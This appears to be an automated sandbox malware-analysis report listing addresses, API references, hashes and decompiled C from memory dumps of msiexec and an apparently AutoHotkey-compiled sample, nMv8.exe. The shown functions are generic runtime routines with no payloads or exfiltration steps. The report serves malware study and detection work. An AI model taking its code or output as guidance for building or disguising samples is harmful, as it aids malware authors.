0x049d5c0b
0x049d5c0e
0x049d5c10
0x049d5bb8
0x049d5bbd
0x049d5bc5
0x00000000
0x00000000
0x049d5bc7
0x049d5bc9
0x049d5bd0
0x00000000
0x049d5bd2
0x049d5bd4
0x049d5bde
0x049d5be6
0x049d5bea
0x00000000
0x049d5bea
0x049d5be6
0x00000000
0x049d5bd0
0x049d5bb8
0x049d5c12
0x049d5c12
0x049d5c12
0x049d5c1a
0x049d5c1d
0x049d5c27
0x049d5c27
0x049d5c2e
0x049d5c41
0x049d5c45
0x049d5c4b
0x049d5c64
0x049d5c6a
0x049d5c6a
0x049d5c6c
0x049d5c8a
0x049d5c6e
0x049d5c6e
0x049d5c73
0x049d5c75
0x049d5c7a
0x049d5c83
0x049d5c83
0x049d5c8f
0x049d5c97
0x049d5c4d
0x049d5c4d
0x049d5c57
0x049d5c5f
0x00000000
0x049d5c5f
0x049d5c30
0x049d5c33
0x049d5c36
0x049d5c98
0x049d5c98
0x049d5c99
0x049d5c9a
0x049d5ca1
0x049d5ca4
0x049d5ca7
0x049d5caa
0x049d5cac
0x049d5cae
0x049d5cb5
0x049d5cb7
0x049d5cb7
0x049d5cb7
0x049d5cbe
0x049d5cc0
0x049d5cc0
0x049d5cbe
0x049d5ccc
0x049d5cd1
0x049d5cd1
0x049d5cd3
0x049d5cf4
0x049d5cf4
0x049d5cf4
0x049d5cd5
0x049d5cd5
0x049d5cdb
0x049d5cde
0x049d5ce2
0x049d5ce8
0x049d5cea
0x049d5cea
0x049d5ce8
0x049d5cf9
0x049d5cfc
0x049d5cff
0x049d5d0b
0x049d5d0b
0x049d5c2e
0x049d59ac
0x049d59ac
0x049d59ae
0x049d59ae
0x049d59b5
0x049d59bc
0x049d5a14
0x049d5a14
0x049d5a19
0x049d5a1d
0x00000000
0x00000000
0x049d5a1f
0x049d5a1f
0x049d5a22
0x049d5a27
0x049d5a2b
0x049d5a2d
0x049d5a2d
0x049d5a30
0x049d5a35
0x049d5a39
0x049d5a3b
0x049d5a3e
0x049d5a40
0x049d5a47
0x00000000
0x049d5a49
0x049d5a4b
0x049d5a50
0x049d5a55
0x049d5a59
0x049d5a61
0x00000000
0x049d5a61
0x049d5a59
0x049d5a47
0x049d5a39
0x00000000
0x049d5a2b
0x049d5a14
0x049d59be
0x049d59be
0x049d59c1
0x049d59c4
0x049d59c9
0x049d59cb
0x049d59e4
0x049d59e7
0x049d59eb
0x049d59ed
0x049d59f0
0x049d5a68
0x049d5a69
0x049d5a6a
0x049d5a71
0x049d5a73
0x049d5a73
0x049d5a78
0x049d5a80
0x00000000
0x00000000
0x049d5a82
0x049d5a84
0x049d5a8b
0x00000000
0x049d5a8d
0x049d5a8f
0x049d5a94
0x049d5a99
0x049d5aa1
0x049d5aa5
0x00000000
0x049d5aa5
0x049d5aa1
0x00000000
0x049d5a8b
0x049d5a73
0x049d5aac
0x049d5ab0
0x049d5ab0
0x049d5ab6
0x049d5b28
0x049d5b2c
0x049d5b32
0x049d5b34
0x049d5b5c
0x049d5b60
0x049d5b62
0x049d5b67
0x049d5b69
0x049d5b6b
0x00000000
0x049d5b6d
0x049d5b6d
0x049d5b72
0x049d5b74
0x049d5b75
0x049d5b76
0x049d5b77
0x049d5b77
0x049d5b36
0x049d5b36
0x049d5b3c
0x049d5b40
0x049d5b46
0x049d5b48
0x049d5b4a
0x049d5b4a
0x049d5b4c
0x049d5b4e
0x049d5b54
0x00000000
0x049d5b54
0x049d5ab8
0x049d5ab8
0x049d5abb
0x049d5ac2
0x049d5ac9
0x049d5acc
0x049d5acf
0x049d5ad6
0x049d5ad9
0x049d5adc
0x049d5adf
0x049d5ae1
0x049d5ae3
0x049d5ae5
0x049d5aea
0x049d5aec
0x049d5aec
0x049d5aec
0x049d5af3
0x049d5af5
0x049d5af5
0x049d5af3
0x049d5afc
0x049d5b01
0x049d5b04
0x049d5b0a
0x049d5b78
0x049d5b78
0x049d5b78
0x049d5b0c
0x049d5b0c
0x049d5b0e
0x049d5b12
0x049d5b14
0x049d5b17
0x049d5b1a
0x049d5b1d
0x049d5b21
0x049d5b21
0x049d5b7d
0x049d5b7d
0x049d5b7d
0x049d5b80
0x049d5b83
0x049d5b85
0x049d5b8a
0x049d5b8c
0x049d5b8f
0x049d5b96
0x049d5b99
0x049d5b99
0x049d5b9c
0x049d5ba0
0x049d5ba3
0x049d5ba6
0x049d5ba8
0x049d5ba8
0x049d5baa
0x049d5bad
0x049d5bb0
0x049d5bb3
0x049d5bb4
0x049d5bb5
0x049d5bb6
0x049d5bb6
0x049d59f2
0x049d59f2
0x049d59f2
0x049d59f2
0x049d59f6
0x049d59f9
0x049d59fc
0x049d59ff
0x049d5a00
0x049d5a00
0x049d59cd
0x049d59cd
0x049d59d1
0x049d59d1
0x049d59d4
0x049d59d7
0x049d59da
0x049d5a04
0x049d5a07
0x049d5a0a
0x049d5a0d
0x049d5a10
0x049d5a11
0x049d59dc
0x049d59dc
0x049d59df
0x049d59e0
0x049d59e0
0x049d59da
0x049d59cb

APIs

Sleep.KERNEL32(00000000,000000FF,049D6234,00000000,049DE4D7,00000000,049DEA1D,00000000,049DECDF,00000000,049DED15), ref: 049D5A4B
Sleep.KERNEL32(0000000A,00000000,000000FF,049D6234,00000000,049DE4D7,00000000,049DEA1D,00000000,049DECDF,00000000,049DED15), ref: 049D5A61
Sleep.KERNEL32(00000000,00000000,?,000000FF,049D6234,00000000,049DE4D7,00000000,049DEA1D,00000000,049DECDF,00000000,049DED15), ref: 049D5A8F
Sleep.KERNEL32(0000000A,00000000,00000000,?,000000FF,049D6234,00000000,049DE4D7,00000000,049DEA1D,00000000,049DECDF,00000000,049DED15), ref: 049D5AA5

Memory Dump Source

Source File: 00000004.00000002.898496674.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true

Associated: 00000004.00000002.898412640.00000000049D0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899079253.0000000004C80000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899090087.0000000004C87000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899099871.0000000004C8B000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899109421.0000000004C8C000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899121700.0000000004C8E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899147930.0000000004C95000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899162929.0000000004C9A000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899179058.0000000004C9C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899187456.0000000004C9D000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899195944.0000000004C9F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_49d0000_msiexec.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: f6da0cf2d67971ab4a28954d7e2fb474fba6a9f88044054b6eca1ff77a678295
Instruction ID: e4fa48e52d5250a65cc5bd9ea7948eef5ce4fc71a2dce5abb5a0a1805ef08dcc
Opcode Fuzzy Hash: f6da0cf2d67971ab4a28954d7e2fb474fba6a9f88044054b6eca1ff77a678295
Instruction Fuzzy Hash: 22C13476601311BFD715CF2AE488719BBE5EB85320F0AC2BED5158B385CBB4AC45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 049D7090, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E049D7090(signed int __eax, void* __edx) {
				short _v530;
				short _v1052;
				short _v1056;
				short _v1058;
				signed int _t20;
				void* _t24;
				WCHAR* _t25;

				_t25 =  &_v1052;
				_t24 = __edx;
				_t20 = __eax;
				if(__eax != 0) {
					 *_t25 = (__eax & 0x000000ff) + 0x41 - 1;
					_v1058 = 0x3a;
					_v1056 = 0;
					GetCurrentDirectoryW(0x105,  &_v530);
					SetCurrentDirectoryW(_t25);
				}
				GetCurrentDirectoryW(0x105,  &_v1052);
				if(_t20 != 0) {
					SetCurrentDirectoryW( &_v530);
				}
				return E049DAC88(_t24, 0x105,  &_v1052);
			}

0x049d7092
0x049d7098
0x049d709a
0x049d709e
0x049d70a8
0x049d70ac
0x049d70b3
0x049d70c7
0x049d70cd
0x049d70cd
0x049d70dc
0x049d70e3
0x049d70ed
0x049d70ed
0x049d710a

APIs

GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 049D70C7
SetCurrentDirectoryW.KERNEL32(?,00000105,?), ref: 049D70CD
GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 049D70DC
SetCurrentDirectoryW.KERNEL32(?,00000105,?), ref: 049D70ED

Strings

:, xrefs: 049D70AC

Memory Dump Source

Source File: 00000004.00000002.898496674.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true

Associated: 00000004.00000002.898412640.00000000049D0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899079253.0000000004C80000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899090087.0000000004C87000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899099871.0000000004C8B000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899109421.0000000004C8C000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899121700.0000000004C8E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899147930.0000000004C95000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899162929.0000000004C9A000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899179058.0000000004C9C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899187456.0000000004C9D000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899195944.0000000004C9F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_49d0000_msiexec.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: 910bc45e2ae3a72a402cb8d8929a657c71b9da3ab3c79d1da5dc82cfe22d05e0
Instruction ID: 8401072cf07fe5d7c7741a534ae57278cddcd716b7b55601b6e97e3df2e210dc
Opcode Fuzzy Hash: 910bc45e2ae3a72a402cb8d8929a657c71b9da3ab3c79d1da5dc82cfe22d05e0
Instruction Fuzzy Hash: 3AF0B471144744B6E310EBA4C851AEB73DCEFC4354F05C439AACCCB294E779A44993A3

Uniqueness

Uniqueness Score: -1.00%

Function 049DCF5C, Relevance: 6.1, APIs: 4, Instructions: 95
threadCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E049DCF5C(signed short __eax, void* __edx) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				signed int _v20;
				short _v22;
				short _v24;
				char _v26;
				char _v32;
				void* __ebp;
				void* _t39;
				void* _t55;
				void* _t59;
				short* _t62;
				signed short _t66;
				void* _t67;
				void* _t68;
				signed short _t79;
				void* _t81;

				_t81 = __edx;
				_t66 = __eax;
				_v16 = 0;
				if(__eax !=  *0x4c92c0c()) {
					_v16 = E049DCF18( &_v8);
					_t79 = _t66;
					_v20 = 3;
					_t62 =  &_v26;
					do {
						 *_t62 =  *(0xf + "0123456789ABCDEF") & 0x000000ff;
						_t79 = (_t79 & 0x0000ffff) >> 4;
						_v20 = _v20 - 1;
						_t62 = _t62 - 2;
					} while (_v20 != 0xffffffff);
					_v24 = 0;
					_v22 = 0;
					 *0x4c92c08(4,  &_v32,  &_v20);
				}
				_t39 = E049DCF18( &_v12);
				_t67 = _t39;
				if(_t67 != 0) {
					_t55 = _v12 - 2;
					if(_t55 >= 0) {
						_t59 = _t55 + 1;
						_v20 = 0;
						do {
							if( *((short*)(_t67 + _v20 * 2)) == 0) {
								 *((short*)(_t67 + _v20 * 2)) = 0x2c;
							}
							_v20 = _v20 + 1;
							_t59 = _t59 - 1;
						} while (_t59 != 0);
					}
					E049DAC34(_t81, _t67);
					_t39 = E049D6ED4(_t67);
				}
				if(_v16 != 0) {
					 *0x4c92c08(0, 0,  &_v20);
					_t68 = E049DCF18( &_v12);
					if(_v8 != _v12 || E049DCEF4(_v16, _v12, _t68) != 0) {
						 *0x4c92c08(8, _v16,  &_v20);
					}
					E049D6ED4(_t68);
					return E049D6ED4(_v16);
				}
				return _t39;
			}

0x049dcf64
0x049dcf66
0x049dcf6a
0x049dcf76
0x049dcf80
0x049dcf83
0x049dcf85
0x049dcf8c
0x049dcf8f
0x049dcfa0
0x049dcfa6
0x049dcfa9
0x049dcfac
0x049dcfaf
0x049dcfb5
0x049dcfbb
0x049dcfcb
0x049dcfcb
0x049dcfd4
0x049dcfd9
0x049dcfdd
0x049dcfe2
0x049dcfe7
0x049dcfe9
0x049dcfea
0x049dcff1
0x049dcff9
0x049dcffe
0x049dcffe
0x049dd004
0x049dd007
0x049dd007
0x049dcff1
0x049dd00e
0x049dd015
0x049dd015
0x049dd01e
0x049dd028
0x049dd036
0x049dd03e
0x049dd05b
0x049dd05b
0x049dd063
0x00000000
0x049dd06b
0x049dd075

APIs

GetThreadUILanguage.KERNEL32(?,00000000), ref: 049DCF6D
SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 049DCFCB
SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 049DD028
SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 049DD05B

Part of subcall function 049DCF18: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,049DCFD9), ref: 049DCF2F
Part of subcall function 049DCF18: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,049DCFD9), ref: 049DCF4C

Memory Dump Source

Source File: 00000004.00000002.898496674.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true

Associated: 00000004.00000002.898412640.00000000049D0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899079253.0000000004C80000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899090087.0000000004C87000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899099871.0000000004C8B000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899109421.0000000004C8C000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899121700.0000000004C8E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899147930.0000000004C95000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899162929.0000000004C9A000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899179058.0000000004C9C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899187456.0000000004C9D000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899195944.0000000004C9F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_49d0000_msiexec.jbxd

Similarity

API ID: Thread$LanguagesPreferred$Language
String ID:
API String ID: 2255706666-0
Opcode ID: ae8e5132d149ac831ef310fce1da853bcbe67c358553c252d83c5eaa0491a18f
Instruction ID: 9f573fe73acaaa24a7b10d250db83d8e94b887b410ed9b1ceda110560a5b9d1d
Opcode Fuzzy Hash: ae8e5132d149ac831ef310fce1da853bcbe67c358553c252d83c5eaa0491a18f
Instruction Fuzzy Hash: C4313C70A0021AEBEF10DFA8D884AEEB3B8EF44314F408675E555E7290DB74AE45CB91

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: nMv8.exe PID: 6680 Parent PID: 4944 nMv8.exeCOMMON

Execution Graph

Execution Coverage:	2.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	6.9%
Total number of Nodes:	652
Total number of Limit Nodes:	17

Executed Functions

Function 00450890, Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 181
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(user32,?,?,?,00000000), ref: 004508B7
GetModuleHandleW.KERNEL32(kernel32,?,00000000), ref: 004508C3
GetModuleHandleW.KERNEL32(comctl32,?,00000000), ref: 004508CF
GetModuleHandleW.KERNEL32(gdi32,?,00000000), ref: 004508DB
_wcsncpy.LIBCMT ref: 004508F7
_wcsrchr.LIBCMT ref: 00450913
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,00000000), ref: 00450940
GetProcAddress.KERNEL32(00000000,?), ref: 00450960
GetProcAddress.KERNEL32(?,?), ref: 004509AF
WideCharToMultiByte.KERNEL32(00000000,00000000,-00000002,000000FF,?,00000104,00000000,00000000,?,?,?,?,00000000), ref: 004509DD
GetModuleHandleW.KERNEL32(?,?,?,?,?,00000000), ref: 004509EB
LoadLibraryW.KERNEL32(?,?,?,?,?,00000000), ref: 00450A06
GetProcAddress.KERNEL32(00000000,?), ref: 00450A3F
GetProcAddress.KERNEL32(00000000,?), ref: 00450A68

Strings

user32, xrefs: 004508B2
comctl32, xrefs: 004508C5
gdi32, xrefs: 004508D1
DllCall, xrefs: 00450A14, 00450AB6
kernel32, xrefs: 004508B9

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: HandleModule$AddressProc$ByteCharMultiWide$LibraryLoad_wcsncpy_wcsrchr
String ID: DllCall$comctl32$gdi32$kernel32$user32
API String ID: 1361463379-1793033601
Opcode ID: 3a21b2b3473bef759d03f8312c8048fa85da8ffeacfff46b815c661ed1a09ac3
Instruction ID: 40a73594808942e6a3432fe0ad0c324e51847c379f8fe4d0271ff3bdb5c5a4f2
Opcode Fuzzy Hash: 3a21b2b3473bef759d03f8312c8048fa85da8ffeacfff46b815c661ed1a09ac3
Instruction Fuzzy Hash: 1E5127B660530167D7309B699C85BABB395EFE4720F05052FE84493292EBB9DC09C7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00450AE0, Relevance: 21.8, APIs: 6, Strings: 6, Instructions: 797COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00450C2D
__wcsnicmp.LIBCMT ref: 00450C8E
_memset.LIBCMT ref: 00450D31
__wcstoui64.LIBCMT ref: 00450EC0
FreeLibrary.KERNEL32(?), ref: 0045141A

Strings

, xrefs: 00450BD1
CDecl, xrefs: 00450C21, 00450C88
@%K, xrefs: 00450B4F
Int, xrefs: 00450CAC
DllCall, xrefs: 00450B4A, 00450CCA, 0045100D
This DllCall requires a prior VarSetCapacity., xrefs: 00450FB8

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: __wcsnicmp$FreeLibrary__wcstoui64_memset
String ID: $@%K$CDecl$DllCall$Int$This DllCall requires a prior VarSetCapacity.
API String ID: 886327013-889194729
Opcode ID: f9c2d35472f796efe49b565942df9734269084f9e3f791c4d9bd4a32bb455281
Instruction ID: 458a19b4f9fa1cbb78d7bcbcf9cede378d98c74bb6c25e6c82ae2e227ef40dd2
Opcode Fuzzy Hash: f9c2d35472f796efe49b565942df9734269084f9e3f791c4d9bd4a32bb455281
Instruction Fuzzy Hash: C052E274A002059FDB24CF58C8817AAB7B0FF05306F24856FEC169B392D779AC49CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00480460, Relevance: 21.2, APIs: 14, Instructions: 174
windowlibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000002,004D6340,004D8728,?,004D8728,00000000,FFFFFF61,00000000,00000000,00000000,004D6340,745FA180,004D8728), ref: 00480479
EnumResourceNamesW.KERNEL32 ref: 004804C6
FindResourceW.KERNEL32(?,?,0000000E), ref: 004804DF
LoadResource.KERNEL32(?,00000000), ref: 004804EF
LockResource.KERNEL32(00000000), ref: 004804FE
GetSystemMetrics.USER32 ref: 00480526
FindResourceW.KERNEL32(?,?,00000003), ref: 00480586
LoadResource.KERNEL32(?,00000000), ref: 00480594
LockResource.KERNEL32(00000000), ref: 0048059F
SizeofResource.KERNEL32(?,00000000,00000001,00030000,00000000,00000000,00000000), ref: 004805BA
CreateIconFromResourceEx.USER32 ref: 004805C2
FreeLibrary.KERNEL32(?), ref: 004805ED
ExtractIconW.SHELL32(00000000,?,?), ref: 00480602
ExtractIconW.SHELL32(00000000,?,-00000001), ref: 0048061F

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: Resource$IconLoad$ExtractFindLibraryLock$CreateEnumFreeFromMetricsNamesSizeofSystem
String ID:
API String ID: 2349713634-0
Opcode ID: 53b4fa39ca7a2450f13793fb86ad05d142804e08cb44d8201b7d4749c5e222bb
Instruction ID: bc99d525df9cf83f70915a52a5508ce3b076cfa0c6c6c411cdc66c836bfb7cdf
Opcode Fuzzy Hash: 53b4fa39ca7a2450f13793fb86ad05d142804e08cb44d8201b7d4749c5e222bb
Instruction Fuzzy Hash: A051F6726553156BD3A0AB68DC44B2FBBD8EB85B21F450D2BFC45D2240D778D8048FB9

Uniqueness

Uniqueness Score: -1.00%

Function 0047F410, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 164
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcschr.LIBCMT ref: 0047F4DA
FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,?,!F@,?,004D8728), ref: 0047F502
FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,!F@,?,004D8728), ref: 0047F51A
_wcschr.LIBCMT ref: 0047F56D
FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,?,!F@,?,004D8728), ref: 0047F592
FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,!F@,?,004D8728), ref: 0047F5A2

Strings

!F@, xrefs: 0047F429

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: Find$CloseFileFirst_wcschr
String ID: !F@
API String ID: 1717823228-372333782
Opcode ID: 75c963de2109aba4f99990059550f25b8cd5a3267534f1bc7774211c30a6f399
Instruction ID: 3962e247aa8d13e049c217f0dd33917bd960985c435d90c69bd457938b023c4f
Opcode Fuzzy Hash: 75c963de2109aba4f99990059550f25b8cd5a3267534f1bc7774211c30a6f399
Instruction Fuzzy Hash: 5A512972510301ABCB109BA4CC85EEB73A8AF95315F45C63EED18A7281F778E90DC799

Uniqueness

Uniqueness Score: -1.00%

Function 00444210, Relevance: 95.4, APIs: 50, Strings: 4, Instructions: 939registrywindowCOMMON

Download Yara Rule

APIs

RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00444231
DefWindowProcW.USER32(?,?,?,?), ref: 004449BE

Strings

TaskbarCreated, xrefs: 0044422C
localhost, xrefs: 0044491E
9000, xrefs: 00444935
AHK_ATTACH_DEBUGGER, xrefs: 004448ED

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: Window$MessageProcRegister
String ID: 9000$AHK_ATTACH_DEBUGGER$TaskbarCreated$localhost
API String ID: 136062168-182697789
Opcode ID: cbf6467e7d4941eb827b6e3c37d2da906d66c62ec6271e852f0de29c807b002d
Instruction ID: 80bc7f5fa79d313f4b074f99b2c784596d3a7a302932d87829c9610e021cc9f2
Opcode Fuzzy Hash: cbf6467e7d4941eb827b6e3c37d2da906d66c62ec6271e852f0de29c807b002d
Instruction Fuzzy Hash: 2062CE726042049BE720DF69EC85B6BB7A8EBC5361F00462BF945D7791D739EC00CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00404150, Relevance: 70.6, APIs: 25, Strings: 15, Instructions: 594
sleepwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E00404150(long long __fp0, intOrPtr _a4) {
				char _v68;
				char _v76;
				long _v80;
				signed int _v84;
				char _v88;
				int _v92;
				char _v93;
				char _v94;
				char _v96;
				intOrPtr _v112;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t85;
				intOrPtr _t86;
				signed int _t87;
				intOrPtr* _t89;
				signed char _t90;
				signed char _t95;
				void* _t97;
				void* _t100;
				struct HWND__* _t106;
				struct HWND__* _t107;
				struct HWND__* _t108;
				struct HWND__* _t115;
				void* _t116;
				struct HWND__* _t118;
				struct HWND__* _t119;
				struct HWND__* _t120;
				struct HWND__* _t122;
				struct HWND__* _t124;
				int _t128;
				int _t130;
				int _t131;
				void* _t132;
				WCHAR* _t133;
				int _t135;
				void* _t137;
				intOrPtr* _t145;
				struct HWND__* _t147;
				struct HWND__* _t149;
				void* _t151;
				struct HWND__* _t154;
				struct HWND__* _t155;
				struct HWND__* _t156;
				struct HWND__* _t157;
				struct HWND__* _t158;
				struct HWND__* _t159;
				struct HWND__* _t160;
				signed int _t161;
				struct HWND__* _t178;
				struct HWND__* _t180;
				intOrPtr* _t184;
				signed int _t193;
				intOrPtr _t195;
				struct HWND__* _t201;
				intOrPtr _t206;
				struct HWND__* _t213;
				intOrPtr _t220;
				struct HWND__* _t222;
				intOrPtr _t229;
				void* _t232;
				struct HWND__* _t234;
				intOrPtr _t241;
				void* _t244;
				struct HWND__* _t246;
				struct HWND__* _t251;
				intOrPtr* _t256;
				void* _t259;
				void* _t260;
				signed int _t261;
				struct HWND__* _t265;
				intOrPtr _t267;
				long _t269;
				struct HWND__* _t273;
				intOrPtr _t274;
				signed int _t275;
				void* _t277;
				void* _t278;
				void* _t279;
				long long* _t283;
				long long* _t284;
				void* _t285;
				void* _t286;
				void* _t298;
				long long _t314;

				_t314 = __fp0;
				_t277 = (_t275 & 0xffffffc0) - 0x74;
				_push(_t246);
				 *0x4d76ec = _a4;
				InitializeCriticalSection(0x4d65e8);
				SetErrorMode(1); // executed
				E0044AD70(0);
				_t85 =  *0x4d4d24; // 0x3211b68
				if(_t85 == 0) {
					L10:
					_t86 = 0x4ae8f8;
				} else {
					_t184 =  *_t85;
					_v88 = _t184;
					if(_t184 == 0 ||  *_t184 == 0) {
						goto L10;
					} else {
						_t244 = _t184 + 2;
						goto L4;
						L4:
						_t229 =  *_t184;
						_t184 = _t184 + 2;
						if(_t229 != 0) {
							goto L4;
						} else {
							_t201 = _t184 - _t244 >> 1;
							_t246 = _t201 + _t201;
							_t274 = E0047B740( &(_t246->i));
							if(_t274 != 0) {
								__eflags = _t201;
								if(_t201 != 0) {
									E004A2210(_t274, _v88, _t246);
									_t277 = _t277 + 0xc;
								}
								 *((short*)(_t246 + _t274)) = 0;
								_t86 = _t274;
							} else {
								_push(_v88);
								_push(L"Out of memory.");
								L004398E0(0x4d8728, __fp0);
								_t86 = 0;
							}
						}
					}
				}
				 *0x4d7f08 = _t86;
				_t87 =  *0x4d5404; // 0x1
				_t193 = 1;
